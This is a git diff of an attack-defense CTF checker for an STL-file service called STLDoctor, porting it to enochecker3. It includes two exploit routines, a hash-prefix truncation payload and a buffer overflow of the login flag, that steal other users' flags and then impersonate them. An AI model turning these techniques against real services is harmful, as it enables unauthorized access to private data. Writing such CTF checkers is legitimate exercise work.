- conn = self.openconn()
- modelid = self.do_upload(conn, modelname, stlfile = evil_file)
- info, contents = self.do_search(conn, modelname, download = False)
- conn.write("search last\n")
- filelist = [l.strip().split(b" : ")[1] for l in conn.recvuntil("? ").split(b"\n") if b" : " in l]
- if len(filelist) == 0:
- raise BrokenServiceException("Failed to list files through search")
-
- # Use it to enumerate other files and grab contents
- found = None
- self.debug("Targets:\n" + "\n".join([" - " + l.decode("latin1") for l in filelist]))
- for i, fhash in enumerate(filelist):
- self.debug(f"Retrieving file {fhash} at index {i}")
- conn.write(f"{i}\nn\n")
- resp = conn.recvuntil("==================")
- resp += conn.recvuntil("? ")
- found = self.search_flag_bytes(resp)
- if found is not None or i == len(filelist) - 1:
- break
-
- # Done!
- conn.write("q\n")
- conn.recvuntil(self.prompt)
- self.closeconn(conn)
-
- if found is None:
- raise BrokenServiceException("Exploit for flagstore 1 failed")
- return found
- elif self.variant_id == 1:
- # Overflow loggedin variable
- conn = self.openconn()
- conn.write(b"search \xff\xff\xff\xff\xff0000000000000000\n")
- conn.recvuntil(self.prompt)
- conn.write("auth\n")
- if b"Already logged in!" not in conn.recvuntil(self.prompt):
- raise BrokenServiceException("Exploit did not set 'loggedin' variable via overflow")
-
- # Get private user hashes via 'list'
- resp = self.do_list(conn, check=False)
- if not resp:
- raise BrokenServiceException("")
- self.debug("List response: " + str(resp))
- users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l]
- self.closeconn(conn)
-
- # Login as each private user
- found = None
- for u in users:
- # Find preimage of user hash
- self.debug(f"Logging in as user with id {u}")
- user = reverse_hash(u)
-
- # Authenticate and check if the user is new
- conn = self.openconn()
- if not self.do_auth(conn, user):
- self.closeconn(conn)
- # We dont raise an exception, because it could be that user dir was cleaned
- # up just before we logged in, not necessarily because of an invalid prehash.
- # If there was a problem with the preimage generation, we wont find a flag and
- # an exception will be raised later anways...
- continue
-
- # List all private files of user
- resp = self.do_list(conn)
-
- # Search for flag in solid names
- names = b"\n".join([l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l])
- found = self.search_flag_bytes(names)
- if found is not None:
- break
-
- if found is None:
- raise BrokenServiceException("Exploit for flagstore 2 failed")
- return found
- else:
- raise EnoException(f"Invalid exploit variant ({self.variant_id}) provided")
+async def do_search(session, logger, modelname, download = False, check = True) -> Optional[Tuple[bytes, bytes]]:
+ modelname = ensure_bytes(modelname)
+
+ # Initiate download
+ logger.debug(f"Retrieving model with name {modelname}")
+ session.writer.write(b"search " + modelname + b"\n")
+ session.writer.write("0\n") # first result
+ session.writer.write("y\n" if download else "n\n")
+ session.writer.write("q\n") # quit
+ await session.writer.drain()
+
+ # Check if an error occured
+ line = await session.reader.readline()
+ if b"ERR:" in line:
+ if check:
+ logger.critical(f"Failed to retrieve model {modelname}:\n{line}")
+ raise MumbleException("File search not working properly")
+ if b"Couldn't find a matching scan result" in line:
+ # collect all the invalid commands sent after (hacky)
+ # TODO: improve by checking every response in search
+ await session.reader.readuntil(prompt)
+ await session.reader.readuntil(prompt)
+ await session.reader.readuntil(prompt)
+ await session.reader.readuntil(prompt)
+ return None
+
+ # read until end of info box
+ fileinfo = line + await session.reader.readuntil("================== \n")
+
+ stlfile = b""
+ if download: # Parse file contents
+ await session.reader.readuntil(b"Here you go.. (")
+ resp = await session.reader.readuntil(b"B)\n")
+ resp = resp[:-3]
+ size = parse_int(resp)
+ if size is None:
+ raise MumbleException(f"Received invalid download size, response:\n{resp}")
+
+ logger.debug(f"Download size: {size}")
+ stlfile = await session.reader.readexactly(size)
+
+ await session.reader.readuntil(prompt)
+ return fileinfo, stlfile
-app = STLDoctorChecker.service # This can be used for uswgi.
+# CHECK WRAPPERS #
+
+async def check_line(session: Session, logger: LoggerAdapter, context: str):
+ line = session.reader.readline()
+ if b"ERR:" in line:
+ logger.critical(f"{context}: Unexpected error message\n")
+ raise MumbleException("Service returned error during valid interaction")
+ return line
+
+async def check_listed(session: Session, logger: LoggerAdapter, includes: Tuple[bytes, ...]) -> bytes:
+ resp = await do_list(session, logger, check = True)
+ if not includes_all(resp, includes):
+ logger.critical(f"Failed to find {includes} in listing:\n{resp}")
+ raise MumbleException("File listing not working properly")
+ return resp
+
+async def check_not_listed(session: Session, logger: LoggerAdapter, excludes: Tuple[bytes, ...], fail: bool = False) -> bytes:
+ resp = await do_list(session, logger, check = False)
+ if fail and resp:
+ logger.critical(f"Expected list to fail, but returned:\n{resp}")
+ raise MumbleException("File listing not working properly")
+ if not fail and not resp:
+ logger.critical(f"List failed unexpectedly:\n{resp}")
+ raise MumbleException("File listing not working properly")
+ if resp and includes_any(resp, excludes):
+ logger.critical(f"Unexpectedly found one of {excludes} in listing:\n{resp}")
+ raise MumbleException("File listing not working properly")
+ return resp
+
+async def check_in_search(session: Session, logger: LoggerAdapter, modelname: bytes, includes: Tuple[bytes], download: bool = False) -> Tuple[bytes, bytes]:
+ info, stlfile = await do_search(session, logger, modelname, download, check = True)
+ if not includes_all(info + stlfile, includes):
+ logger.critical(f"Retrieved info for {modelname} is missing {includes}: {resp}")
+ raise MumbleException("File search not working properly")
+ return info, stlfile
+
+async def check_not_in_search(session: Session, logger: LoggerAdapter, modelname: bytes, excludes: Tuple[bytes], download: bool = False, fail: bool = False) -> Tuple[bytes, bytes]:
+ resp = await do_search(session, logger, modelname, download, check = False)
+ if resp:
+ combined = resp[0] + resp[1]
+ if fail and resp:
+ logger.critical("Search for {modelname} succeeded unexpectedly:\n{combined}")
+ raise MumbleException("File search not working properly")
+ if not fail and not resp:
+ logger.critical(f"Search for {modelname} failed unexpectedly")
+ raise MumbleException("File search not working properly")
+ if resp and includes_any(combined, excludes):
+ logger.critical(f"Unexpectedly {modelname} info contains one of {includes}: {combined}")
+ raise MumbleException("File search not working properly")
+ return resp
+
+def check_hash(hashstr: bytes) -> None:
+ if not has_alph(hashstr, b"0123456789abcdef"):
+ raise MumbleException("Invalid model hash format returned")
+
+def check_stlinfo(logger: LoggerAdapter, resp: bytes, ref_info: Any, ref_modelid: Optional[bytes] = None,
+ ref_modelname: Optional[bytes] = None, ref_solidname: Optional[bytes] = None) -> None:
+ def logthrow(msg):
+ logger.critical(msg)
+ raise MumbleException("STL parsing not working properly")
+
+ size = parse_int(assert_match(resp, b"File Size: (.*)\n", MumbleException))
+ if not size or size != ref_info["size"]:
+ logthrow(f"STL info returned no / invalid file size: {size} != {ref_info['size']}")
+
+ triangle_count = parse_int(assert_match(resp, b"Triangle Count: (.*)\n", MumbleException))
+ if not triangle_count or triangle_count != ref_info["triangle_count"]:
+ logthrow(f"STL info returned no / invalid triangle count: {triangle_count} != {ref_info['triangle_count']}")
+
+ bb_size_str = assert_match(resp, b"Bounding Box Size: (.*)\n", MumbleException)
+ bb_size = [parse_float(v) for v in bb_size_str.split(b" x ")]
+ if None in bb_size:
+ logthrow(f"STL info returned invalid bounding box size: {bb_size_str}")
+ if False in [approx_equal(bb_size[i], ref_info["bb_size"][i]) for i in range(3)]:
+ logthrow(f"Bounding box size doesnt match: (REF) {ref_info['bb_size']} {bb_size}")
+
+ bb_origin_str = assert_match(resp, b"Bounding Box Origin: (.*)\n", MumbleException)
+ bb_origin = [parse_float(v) for v in bb_origin_str.split(b" x ")]
+ if None in bb_origin:
+ logthrow(f"STL info returned invalid bounding box origin: {bb_origin_str}")
+ if False in [approx_equal(bb_origin[i], ref_info["bb_origin"][i]) for i in range(3)]:
+ logthrow(f"Bounding box origin doesnt match: (REF) {ref_info['bb_origin']} {bb_origin}")
+
+ triangle_count = parse_float(assert_match(resp, b"Triangle Count: (.*)\n", MumbleException))
+ if triangle_count is None or triangle_count != ref_info["triangle_count"]:
+ logthrow(f"Triangle count {triangle_count} doesnt match expected: {ref_info['triangle_count']}")
+
+ if ref_modelname:
+ modelname = assert_match(resp, b"Model Name: (.*)\n", MumbleException)
+ if modelname != ref_modelname:
+ logthrow(f"Got modelname {modelname}, expected {ref_modelname}")
+
+ if ref_modelid:
+ modelid = assert_match(resp, b"Model ID: (.*)\n", MumbleException)
+ if modelid != ref_modelid:
+ logthrow(f"Got modelid {modelid}, expected {ref_modelid}")
+
+ if ref_solidname:
+ solidname = assert_match(resp, b"Solid Name: (.*)\n", MumbleException)
+ if solidname != ref_solidname:
+ logthrow(f"Got solidname {solidname}, expected {ref_solidname}")
+
+
+# TEST METHODS #
+
+async def test_good_upload(di: DependencyInjector, filetype: str, register: str) -> None:
+ solidname = fakeid(havoc = (filetype == "bin")) # ascii stl cant handle havoc
+ modelname, authstr = fakeids(2, havoc = True)
+ stlfile = genfile(solidname, filetype)
+ ref_info = parse_stlinfo(stlfile)
+ logger = await di.get(LoggerAdapter)
+
+ # Create new session, register and upload file
+ session = await di.get(Session)
+ await session.prepare()
+ if register:
+ await do_auth(session, logger, authstr)
+ modelid = await do_upload(session, logger, modelname, stlfile)
+ check_hash(modelid)
+ expected = [modelname, solidname, stlfile, modelid]
+ info, stlfile = await check_in_search(session, logger, modelname, expected, download = True)
+ check_stlinfo(logger, info, ref_info, ref_modelname = modelname,
+ ref_modelid = modelid, ref_solidname = solidname)
+ if register:
+ resp = await check_listed(session, logger, [modelname, modelid + b"-"])
+ await session.close()
+
+ # Try getting file from a new session
+ session = await di.get(Session)
+ await session.prepare()
+ if register:
+ await check_not_in_search(session, logger, modelname, expected, download = True, fail = True)
+ await do_auth(session, logger, authstr)
+ info, stlfile = await check_in_search(session, logger, modelname, expected, download = True)
+ check_stlinfo(logger, info, ref_info, ref_modelname = modelname,
+ ref_modelid = modelid, ref_solidname = solidname)
+ await check_listed(session, logger, [modelname, modelid + b"-"])
+ else:
+ info, stlfile = await check_in_search(session, logger, modelname, expected, download = True)
+ check_stlinfo(logger, info, ref_info, ref_modelname = modelname,
+ ref_modelid = modelid, ref_solidname = solidname)
+ await session.close()
+
+async def test_bad_upload(di: DependencyInjector, filetype: str, variant: int) -> None:
+ modelname, solidname = fakeids(2)
+ stlfile = genfile(solidname, filetype, malformed = variant)
+ logger = await di.get(LoggerAdapter)
+
+ # Ensure a malformed file causes an error
+ session = await di.get(Session)
+ await session.prepare()
+ if await do_upload(session, logger, modelname, stlfile, check = False):
+ logger.critical(f"Able to upload malformed file:\n{stlfile}")
+ raise MumbleException("Upload validation not working properly")
+ await session.close()
+
+async def test_search(di: DependencyInjector, registered = False) -> None:
+ solidname, modelname, authstr = fakeids(3)
+ stlfile = genfile(solidname, "bin")
+ logger = await di.get(LoggerAdapter)
+
+ # Ensure searching for a file that doesnt exist causes an error
+ session = await di.get(Session)
+ await session.prepare()
+ if registered:
+ await do_auth(session, logger, authstr)
+ if await do_search(session, logger, modelname, download = False, check = None):
+ logger.critical(f"Search for file that shouldn't exist returned a file:\n{resp}")
+ raise MumbleException("File search not working properly")
+ await session.close()
+
+async def test_list(di: DependencyInjector, registered = False) -> None:
+ solidname, modelname, authstr, authstr2 = fakeids(4)
+ stlfile = genfile(solidname, "bin")
+ logger = await di.get(LoggerAdapter)
+
+ if registered:
+ # Create a session and upload a file
+ session = await di.get(Session)
+ await session.prepare()
+ await do_auth(session, logger, authstr)
+ modelid = await do_upload(session, logger, modelname, stlfile)
+ await check_listed(session, logger, [modelname, modelid + b"-"])
+ await session.close()
+
+ # Ensure that list for another user does not return first users files
+ session = await di.get(Session)
+ await session.prepare()
+ if await do_auth(session, logger, authstr2):
+ logger.critical("New authstr {authstr2} already has a user dir! Hash collision?!")
+ raise MumbleException("User authentication not working properly")
+ await check_not_listed(session, logger, [modelid, modelname])
+ await session.close()
+ else:
+ # Ensure that list does not work for unregistered users
+ session = await di.get(Session)
+ await session.prepare()
+ if await do_list(session, logger, check = False):
+ logger.critical("Unregistered user can run list without ERR!")
+ raise MumbleException("User authentication not working properly")
+ await session.close()
+
+# CHECKER METHODS #
+
+@checker.putflag(0)
+async def putflag_guest(task: PutflagCheckerTaskMessage, di: DependencyInjector) -> None:
+ modelname: bytes = fakeid()
+ logger: LoggerAdapter = await di.get(LoggerAdapter)
+ db: ChainDB = await di.get(ChainDB)
+
+ session: Session = await di.get(Session)
+ await session.prepare()
+ stlfile: bytes = genfile(task.flag, "ascii")
+ modelid: bytes = await do_upload(session, logger, modelname, stlfile)
+ await session.close()
+
+ await db.set("flag-0-info", (modelname, modelid))
+
+@checker.putflag(1)
+async def putflag_private(task: PutflagCheckerTaskMessage, di: DependencyInjector) -> None:
+ modelname, authstr = fakeids(2)
+ stlfile: bytes = genfile(task.flag, "bin")
+ logger: LoggerAdapter = await di.get(LoggerAdapter)
+ db: ChainDB = await di.get(ChainDB)
+
+ session: Session = await di.get(Session)
+ await session.prepare()
+ await do_auth(session, logger, authstr)
+ modelid: bytes = await do_upload(session, logger, modelname, stlfile)
+ await session.close()
+
+ await db.set("flag-1-info", (modelname, modelid, authstr))
+
+@checker.getflag(0)
+async def getflag_guest(task: GetflagCheckerTaskMessage, di: DependencyInjector) -> None:
+ db: ChainDB = await di.get(ChainDB)
+ modelname, modelid = await getdb(db, "flag-0-info")
+ logger: LoggerAdapter = await di.get(LoggerAdapter)
+
+ session: Session = await di.get(Session)
+ await session.prepare()
+ stlinfo, stlfile = await do_search(session, logger, modelname, download = True)
+ assert_in(task.flag.encode(), stlinfo, "Flag is missing from stl info")
+ assert_in(task.flag.encode(), stlfile, "Flag is missing from stl file")
+ await session.close()
+
+@checker.getflag(1)
+async def getflag_private(task: GetflagCheckerTaskMessage, di: DependencyInjector) -> None:
+ db: ChainDB = await di.get(ChainDB)
+ modelname, modelid, authstr = await getdb(db, "flag-1-info")
+ logger = await di.get(LoggerAdapter)
+
+ session = await di.get(Session)
+ await session.prepare()
+ await do_auth(session, logger, authstr)
+ stlinfo, stlfile = await do_search(session, logger, modelname, download = True)
+ assert_in(task.flag.encode(), stlinfo, "Flag is missing from stl info")
+ assert_in(task.flag.encode(), stlfile, "Flag is missing from stl file")
+ resp = await do_list(session, logger)
+ assert_in(task.flag.encode(), resp, "Flag is missing from list")
+ await session.close()
+
+@checker.putnoise(0, 1)
+async def putnoise_guest_ascii(task: PutnoiseCheckerTaskMessage, di: DependencyInjector) -> None:
+ modelname, solidname = fakeids(2)
+ logger: LoggerAdapter = await di.get(LoggerAdapter)
+ db: ChainDB = await di.get(ChainDB)
+
+ session: Session = await di.get(Session)
+ await session.prepare()
+ stlfile = genfile(solidname, "ascii" if task.variant_id == 0 else "bin")
+ modelid = await do_upload(session, logger, modelname, stlfile)
+ await session.close()
+
+ await db.set(f"noise-{task.variant_id}-info", (modelid, modelname, solidname, stlfile))
+
+@checker.putnoise(2, 3)
+async def putnoise_priv_ascii(task: PutnoiseCheckerTaskMessage, di: DependencyInjector) -> None:
+ modelname, solidname, authstr = fakeids(3)
+ logger: LoggerAdapter = await di.get(LoggerAdapter)
+ db: ChainDB = await di.get(ChainDB)
+
+ session: Session = await di.get(Session)
+ await session.prepare()
+ stlfile = genfile(solidname, "ascii" if task.variant_id == 0 else "bin")
+ await do_auth(session, logger, authstr)
+ modelid = await do_upload(session, logger, modelname, stlfile)
+ await session.close()
+
+ await db.set(f"noise-{task.variant_id}-info", (modelid, modelname, solidname, stlfile, authstr))
+
+@checker.getnoise(0, 1)
+async def getnoise_guest_ascii(task: GetnoiseCheckerTaskMessage, di: DependencyInjector) -> None:
+ db: ChainDB = await di.get(ChainDB)
+ modelid, modelname, solidname, stlfile = await getdb(db, f"noise-{task.variant_id}-info")
+ logger: LoggerAdapter = await di.get(LoggerAdapter)
+
+ session: Session = await di.get(Session)
+ await session.prepare()
+ await check_in_search(session, logger, modelname, [modelname, solidname, stlfile, modelid], download = True)
+ await session.close()
+
+@checker.getnoise(2, 3)
+async def getnoise_priv_ascii(task: GetnoiseCheckerTaskMessage, di: DependencyInjector) -> None:
+ db: ChainDB = await di.get(ChainDB)
+ modelid, modelname, solidname, stlfile, authstr = await getdb(db, f"noise-{task.variant_id}-info")
+ logger: LoggerAdapter = await di.get(LoggerAdapter)
+
+ session: Session = await di.get(Session)
+ await session.prepare()
+ await do_auth(session, logger, authstr)
+ await check_in_search(session, logger, modelname, [modelname, solidname, stlfile, modelid], download = True)
+ await session.close()
+
+@checker.havoc(*range(0, 4))
+async def havoc_good_upload(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None:
+ filetype = ["ascii", "bin", "ascii", "bin"]
+ registered = [False, False, True, True]
+ await test_good_upload(di, filetype[task.variant_id], registered[task.variant_id])
+
+@checker.havoc(*range(4, 12))
+async def havoc_bad_upload(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None:
+ filetype = ["ascii", "ascii", "ascii", "bin", "bin", "bin", "garbage", "garbage-tiny"]
+ upload_variant = [1, 2, 3, 1, 2, 3, 1, 1]
+ await test_bad_upload(di, filetype[task.variant_id - 4], upload_variant[task.variant_id - 4])
+
+@checker.havoc(12, 13)
+async def havoc_test_search(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None:
+ await test_search(di, task.variant_id == 12)
+
+@checker.havoc(14, 15)
+async def havoc_test_list(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None:
+ await test_list(di, task.variant_id == 14)
+
+@checker.havoc(16)
+async def havoc_fluff_upload(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None:
+ if len(extra_models) == 0: return
+ model = rand.choice(extra_models)
+ modelname = os.path.basename(model).split("-")[0]
+ modelname += "".join([rand.choice("0123456789") for i in range(5)])
+ stlfile = open(model, "rb").read()
+ logger = await di.get(LoggerAdapter)
+
+ session = await di.get(Session)
+ await session.prepare()
+ modelid = await do_upload(session, logger, modelname, stlfile)
+ await check_in_search(session, logger, modelname, [modelname, modelid, stlfile], download = True)
+
+@checker.exploit(0)
+async def exploit_prefix_truncation(di: DependencyInjector):
+ modelname = fakeid()
+ logger = await di.get(LoggerAdapter)
+ searcher = await di.get(FlagSearcher)
+
+ # Upload evil file for parse via search for hash truncation
+ session = await di.get(Session)
+ await session.prepare()
+ logger.debug(f"Uploading evil file for hash truncation")
+ modelid = await do_upload(session, logger, modelname, stlfile = search_truncation_payload)
+ info, contents = await do_search(session, logger, modelname, download = False)
+ session.writer.write("search last\n")
+ await session.writer.drain()
+ resp = await session.reader.readuntil("? ")
+ filelist = [l.strip().split(b" : ")[1] for l in resp.split(b"\n") if b" : " in l]
+ if len(filelist) == 0:
+ raise MumbleException("Failed to list files through search")
+
+ # Use it to enumerate other files and grab contents
+ logger.debug("Targets:\n" + "\n".join([" - " + l.decode("latin1") for l in filelist]))
+ for i, fhash in enumerate(filelist):
+ logger.debug(f"Retrieving file {fhash} at index {i}")
+ session.writer.write(f"{i}\nn\n")
+ await session.writer.drain()
+ resp = await session.reader.readuntil("==================")
+ resp += await session.reader.readuntil("? ")
+ if flag := searcher.search_flag(resp.decode("latin1")):
+ return flag
+
+ # Done!
+ session.writer.write("q\n")
+ await session.writer.drain()
+ await session.reader.readuntil(prompt)
+ await session.close()
+
+ raise MumbleException("Exploit for flagstore 1 failed")
+
+@checker.exploit(1)
+async def exploit_hash_overflow(di: DependencyInjector) -> None:
+ logger = await di.get(LoggerAdapter)
+ searcher = await di.get(FlagSearcher)
+
+ # Overflow loggedin variable
+ session = await di.get(Session)
+ await session.prepare()
+ session.writer.write(b"search \xff\xff\xff\xff\xff0000000000000000\n")
+ await session.writer.drain()
+ await session.reader.readuntil(prompt)
+ session.writer.write("auth\n")
+ await session.writer.drain()
+ resp = await session.reader.readuntil(prompt)
+ if b"Already logged in!" not in resp:
+ raise MumbleException("Exploit did not set 'loggedin' variable via overflow")
+
+ # Get private user hashes via 'list'
+ resp = await do_list(session, logger, check=False)
+ if not resp:
+ raise MumbleException("")
+ logger.debug("List response: " + str(resp))
+ users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l]
+ await session.close()
+
+ # Login as each private user
+ for userhash in users:
+ # Find preimage of user hash
+ logger.debug(f"Logging in as user with id {userhash}")
+ authstr = reverse_hash(userhash)
+
+ # Authenticate and check if the user is new
+ session = await di.get(Session)
+ await session.prepare()
+ if not await do_auth(session, logger, authstr):
+ await session.close()
+ # We dont raise an exception, because it could be that user dir was cleaned
+ # up just before we logged in, not necessarily because of an invalid prehash.
+ # If there was a problem with the preimage generation, we wont find a flag and
+ # an exception will be raised later anways...
+ continue
+
+ # List all private files of user
+ resp = await do_list(session, logger)
+ await session.close()
+
+ # Search for flag in solid names
+ solidnames = b"\n".join([l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l])
+ if flag := searcher.search_flag(solidnames.decode("latin1")):
+ return flag
+
+ raise MumbleException("Exploit for flagstore 2 failed")
+
if __name__ == "__main__":
- run(STLDoctorChecker)
+ checker.run(port = 9091)
diff --git a/checker/src/gunicorn.conf.py b/checker/src/gunicorn.conf.py
@@ -1,7 +1,7 @@
import multiprocessing
-worker_class = "eventlet"
-workers = multiprocessing.cpu_count() * 2 + 1
+worker_class = "uvicorn.workers.UvicornWorker"
+workers = min(4, multiprocessing.cpu_count())
bind = "0.0.0.0:3031"
timeout = 90
keepalive = 3600
diff --git a/checker/src/requirements.txt b/checker/src/requirements.txt
@@ -1,6 +1,6 @@
-
-git+https://github.com/Sinitax/enochecker@f04cab0fd57fbc927809e88c97a1dd37579089ee
-eventlet==0.30.2
+#git+https://github.com/Sinitax/enochecker@f04cab0fd57fbc927809e88c97a1dd37579089ee
+enochecker3==0.3.0
+uvicorn==0.14.0
gunicorn==20.1.0
numpy==1.20.1
Faker==8.1.4